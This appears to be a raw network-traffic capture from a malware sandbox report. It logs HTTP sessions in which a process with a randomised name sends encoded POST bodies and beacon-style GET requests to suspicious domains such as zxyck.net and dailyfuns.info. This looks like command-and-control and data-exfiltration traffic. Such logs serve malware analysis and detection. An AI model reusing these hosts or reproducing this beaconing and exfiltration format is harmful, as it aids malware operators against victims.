                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FW46V0Oq5KMVw7ISjMoLV8on3q4mwgE%2BpFRUF1J%2FgMnN1eKtZDRaR%2FJiLQXow9E3I7affssyLs%2FE4cYr5IgLgNpMFlTAOyQkleau2%2FQyhSCRwSxBce3a9soiX19AKkpqf%2FCWrmTnte67NI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed2301f9380fa1-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1525&rtt_var=762&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10881&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Jan 8, 2025 16:14:21.387602091 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.450026188.114.97.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:23.413286924 CET496OUTGET /2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:24.015753031 CET798INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F10gPv6OCHsUQcbfnGTrcEBymziWM5TIYElYGd2j1jnYhgEGNyAZ8UrI78sAt3xZIZnDBcu3eVWj9HqAQAKUZ3Ok6S%2BALvIx6a9MuPrfHqEmoujCAqYF7yRZIDJQLZI4bb%2BURB3kPstjEPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed231288975e80-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.450027118.107.250.103803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:29.541709900 CET746OUTPOST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 64 2f 45 77 78 34 44 52 6f 79 68 6a 4c 45 76 36 34 43 64 6b 6d 7a 4e 65 4d 53 71 38 33 54 70 6a 78 31 59 6c 69 4e 71 47 63 58 68 55 76 2f 34 4f 64 4e 4d 4a 65 64 68 64 53 79 6b 2b 4b 31 52 55 6f 37 59 6e 4c 62 4c 7a 79 67 4d 42 59 71 45 35 44 73 42 6e 67 37 6f 6f 78 35 38 71 78 6c 43 73 62 55 79 69 37 41 32 68 56 74 74 69 6c 48 4d 4d 4b 34 4a 43 75 5a 2f 5a 6a 58 38 6e 6a 57 38 77 38 31 37 69 49 64 77 32 64 6d 47 54 30 6b 72 34 74 5a 35 4e 36 47 31 46 33 49 6b 49 45 4c 33 6e 6d 37 56 38 59 50 4b 35 50 6a 77 79 44 6f 39 53 4e 79 37 4a 4c 51 3d 3d
                                                                      Data Ascii: xP7x=8gHotV00muxVd/Ewx4DRoyhjLEv64CdkmzNeMSq83Tpjx1YliNqGcXhUv/4OdNMJedhdSyk+K1RUo7YnLbLzygMBYqE5DsBng7oox58qxlCsbUyi7A2hVttilHMMK4JCuZ/ZjX8njW8w817iIdw2dmGT0kr4tZ5N6G1F3IkIEL3nm7V8YPK5PjwyDo9SNy7JLQ==
                                                                      Jan 8, 2025 16:14:30.383698940 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:00 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.450028118.107.250.103803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:32.123348951 CET766OUTPOST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 39 6a 77 51 6b 6c 77 38 71 47 66 58 68 55 6b 66 35 4b 54 74 4d 53 65 64 6b 69 53 78 38 2b 4b 31 46 55 6f 35 51 6e 4c 4b 4c 79 67 41 4d 48 51 4b 45 2f 48 73 42 6e 67 37 6f 6f 78 35 6f 41 78 6c 61 73 61 6b 43 69 30 43 65 2b 57 74 74 68 78 58 4d 4d 4f 34 49 71 75 5a 2f 33 6a 54 39 76 6a 51 34 77 38 77 66 69 49 73 77 78 45 32 47 5a 37 45 72 71 68 35 30 55 39 44 34 74 39 4f 4d 50 4c 61 7a 52 6a 39 59 6d 4a 2b 72 75 64 6a 55 42 65 76 30 6d 41 78 47 41 51 65 54 66 37 68 50 57 65 37 70 61 79 4a 59 45 30 79 38 42 79 44 55 3d
                                                                      Data Ascii: xP7x=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3h9jwQklw8qGfXhUkf5KTtMSedkiSx8+K1FUo5QnLKLygAMHQKE/HsBng7oox5oAxlasakCi0Ce+WtthxXMMO4IquZ/3jT9vjQ4w8wfiIswxE2GZ7Erqh50U9D4t9OMPLazRj9YmJ+rudjUBev0mAxGAQeTf7hPWe7payJYE0y8ByDU=
                                                                      Jan 8, 2025 16:14:32.991274118 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:02 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.450029118.107.250.103803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:34.693032980 CET10848OUTPOST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 6c 6a 77 6d 77 6c 68 72 47 47 65 58 68 55 6e 66 35 4a 54 74 4e 49 65 5a 49 6d 53 32 31 44 4b 33 39 55 70 62 6f 6e 65 4f 58 79 35 77 4d 48 63 71 45 36 44 73 42 79 67 37 34 6b 78 35 34 41 78 6c 61 73 61 6d 61 69 77 51 32 2b 61 4e 74 69 6c 48 4d 32 4b 34 4a 48 75 5a 47 4b 6a 54 77 4e 69 67 59 77 38 51 50 69 4b 2b 59 78 62 6d 47 66 38 45 71 35 68 35 34 78 39 44 4d 50 39 4b 45 70 4c 61 48 52 75 73 42 73 4e 2b 37 6c 47 30 73 41 42 66 46 46 5a 47 54 42 59 65 66 37 38 6a 6a 61 46 4b 74 4a 30 75 67 4a 67 54 51 46 6d 33 75 58 6a 56 53 69 73 52 68 42 62 41 63 6b 44 36 46 74 4b 35 4e 6b 39 46 70 48 79 66 50 34 73 7a 4c 63 2b 5a 53 36 34 62 46 38 34 6b 50 4f 63 49 39 41 31 6c 4c 64 46 2b 77 34 7a 36 51 6d 7a 39 47 39 4e 37 30 48 62 2f 30 62 35 5a 61 4f 46 4c 34 73 6d 7a 73 4a 51 32 73 76 34 57 50 4f 64 61 4d 73 71 6f 5a 32 4c 37 54 58 39 72 59 38 36 78 55 47 66 42 6d 51 36 [TRUNCATED]
                                                                      Data Ascii: xP7x=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3hljwmwlhrGGeXhUnf5JTtNIeZImS21DK39UpboneOXy5wMHcqE6DsByg74kx54AxlasamaiwQ2+aNtilHM2K4JHuZGKjTwNigYw8QPiK+YxbmGf8Eq5h54x9DMP9KEpLaHRusBsN+7lG0sABfFFZGTBYef78jjaFKtJ0ugJgTQFm3uXjVSisRhBbAckD6FtK5Nk9FpHyfP4szLc+ZS64bF84kPOcI9A1lLdF+w4z6Qmz9G9N70Hb/0b5ZaOFL4smzsJQ2sv4WPOdaMsqoZ2L7TX9rY86xUGfBmQ6+RC4SJIwn0yjGbC+V+j14+TvvzX9tGxzZzyUt0il5k0atdH9gIjV4Uztc3zPZr15u8c3pm9gbqQ9FLRm6vI1EXX/3YOMR12bedmwfHfv1CCxqRxL51ux/xfnMkA2nFrj0RyxgN134zOLwL5jfzkxj/YOz3wxGaU8x5HkPQqG0FRTSfNMvrmgWV6qPDqoj69I/4JBuKA/Esw/BHTb6Cnge9puVo3MjH+sxtxuMjYSoddnoA9HKfQriwRH4EJ6pXMN+lQR8Ht6bkNxod9kQQLRmcXONvUytRYSVNb/cGTKs2CnYxKHtqRFoq4hcmctlqTeDTGZl2O1V22hKwpIEVwNckTcWsp9t4zPc5zCa7FNZpFzNQ1fyG2kfOZ0iw4oriyaAXbCBzuUYfO+fP6SX9fb/mFkKjLKoN5BXwub35U0AmbdDRWKTMyeWVLRhR3KhM3J+M/ftAXKNpUmlUZ7UXze8lFr0cw/sOvJQBaXmC5mG7GJV1WVfl1L3FNaDY1lYIBw0r/u9wlQgUF/NeXA17MrCfusfEZPzfBj70jbPxasyPKso/ngg3KoQEySzEbIj4dWHKueG73TstuNoMvHzuEJXv7Esp5OAAum+GeDGZZ5356M4Q+RX9jbEObyYMEzVdYKyZt/RN+V/6N6LP88jsBCslMPCjbNg8aJQv [TRUNCATED]
                                                                      Jan 8, 2025 16:14:35.548619986 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:05 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.450030118.107.250.103803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:37.241071939 CET485OUTGET /gxyh/?xP7x=xivIugper8hSVuoO04uKuRFsECiR4QMGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT+8RMEQc9vH5Jgj7hQnpQkzk/1bmr1+yLEUs8=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:38.111676931 CET266INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:07 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1c/www/wwwroot/zxyck.net/gxyh.0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.450031209.74.77.109803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:43.174268961 CET761OUTPOST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 47 33 42 44 6c 77 34 6a 6e 4d 64 35 76 78 2b 4a 50 69 6c 69 71 64 69 39 79 59 4a 61 56 68 50 71 76 6e 62 41 79 4f 78 7a 72 58 32 56 69 37 59 5a 69 59 47 39 33 6d 6b 4b 44 4b 69 6c 50 4c 41 68 4f 69 2b 36 34 34 41 36 63 42 30 57 45 57 70 6f 68 6d 34 6d 4e 77 65 64 64 47 74 6c 46 38 5a 62 55 65 50 4b 38 75 33 74 31 54 71 76 36 65 48 6d 45 76 65 6f 6f 77 76 48 46 4e 32 39 34 4e 54 75 61 35 76 37 6a 54 6f 46 4e 77 6d 72 34 73 67 6e 77 4c 75 36 2b 43 30 71 4f 66 57 67 52 39 32 4e 6f 6c 52 77 4c 4a 6e 4f 47 67 4f 4c 31 61 77 55 6d 69 51 6f 77 3d 3d
                                                                      Data Ascii: xP7x=N+9LpEXYE/G8IG3BDlw4jnMd5vx+JPiliqdi9yYJaVhPqvnbAyOxzrX2Vi7YZiYG93mkKDKilPLAhOi+644A6cB0WEWpohm4mNweddGtlF8ZbUePK8u3t1Tqv6eHmEveoowvHFN294NTua5v7jToFNwmr4sgnwLu6+C0qOfWgR92NolRwLJnOGgOL1awUmiQow==
                                                                      Jan 8, 2025 16:14:43.772525072 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:43 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.450032209.74.77.109803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:45.727068901 CET781OUTPOST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 46 50 71 50 58 62 53 48 75 78 79 72 58 32 64 43 37 64 55 43 59 5a 39 32 62 48 4b 44 47 69 6c 4f 72 41 68 4d 36 2b 36 4c 51 44 37 4d 42 32 65 6b 57 72 6d 42 6d 34 6d 4e 77 65 64 64 54 77 6c 46 6b 5a 48 31 75 50 59 75 57 34 78 46 54 72 6f 36 65 48 69 45 76 53 6f 6f 77 4a 48 42 45 5a 39 36 46 54 75 66 56 76 36 79 54 72 4d 4e 77 6b 6b 59 74 4a 33 67 32 35 67 4e 37 6a 73 2b 71 34 75 6a 4a 55 4d 75 6f 4c 68 36 6f 77 63 47 45 39 57 79 54 45 5a 6c 66 5a 7a 77 30 4f 65 54 33 31 5a 6b 57 39 4c 76 4f 54 72 36 51 4b 4a 58 63 3d
                                                                      Data Ascii: xP7x=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanFPqPXbSHuxyrX2dC7dUCYZ92bHKDGilOrAhM6+6LQD7MB2ekWrmBm4mNweddTwlFkZH1uPYuW4xFTro6eHiEvSoowJHBEZ96FTufVv6yTrMNwkkYtJ3g25gN7js+q4ujJUMuoLh6owcGE9WyTEZlfZzw0OeT31ZkW9LvOTr6QKJXc=
                                                                      Jan 8, 2025 16:14:46.301549911 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:46 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.450033209.74.77.109803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:48.268421888 CET10863OUTPOST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 4e 50 72 2b 33 62 41 52 6d 78 78 72 58 32 54 69 37 63 55 43 5a 44 39 32 44 62 4b 43 37 56 6c 4c 76 41 68 76 79 2b 38 36 51 44 77 4d 42 32 42 55 57 71 6f 68 6d 74 6d 4e 68 32 64 64 44 77 6c 46 6b 5a 48 32 32 50 49 4d 75 34 69 56 54 71 76 36 65 4c 6d 45 75 50 6f 6f 5a 79 48 42 4a 6d 39 71 6c 54 76 2f 46 76 38 41 37 72 55 64 77 69 6a 59 74 52 33 67 37 2b 67 4e 6e 76 73 38 4c 6a 75 67 56 55 4d 50 4e 55 7a 70 46 72 66 57 45 45 56 68 69 75 66 53 37 66 34 7a 6b 77 4f 79 32 70 4a 6d 4b 2b 50 64 72 2b 38 4c 4d 54 52 33 68 39 2b 69 62 45 66 57 54 75 4c 64 31 32 6a 38 6f 34 50 54 65 75 6c 59 57 58 33 67 69 48 41 6f 79 47 71 61 4d 48 66 33 6c 6b 73 70 77 2b 41 33 55 4d 2b 59 55 50 68 53 59 69 46 4e 73 46 38 34 73 68 74 76 6c 32 37 4f 49 71 45 31 65 4b 41 6a 6b 67 6d 76 4c 56 58 73 59 2f 6e 4a 47 6a 63 7a 35 4c 6a 59 46 75 4c 31 70 2b 74 45 77 36 34 30 77 4a 62 50 34 4b 77 [TRUNCATED]
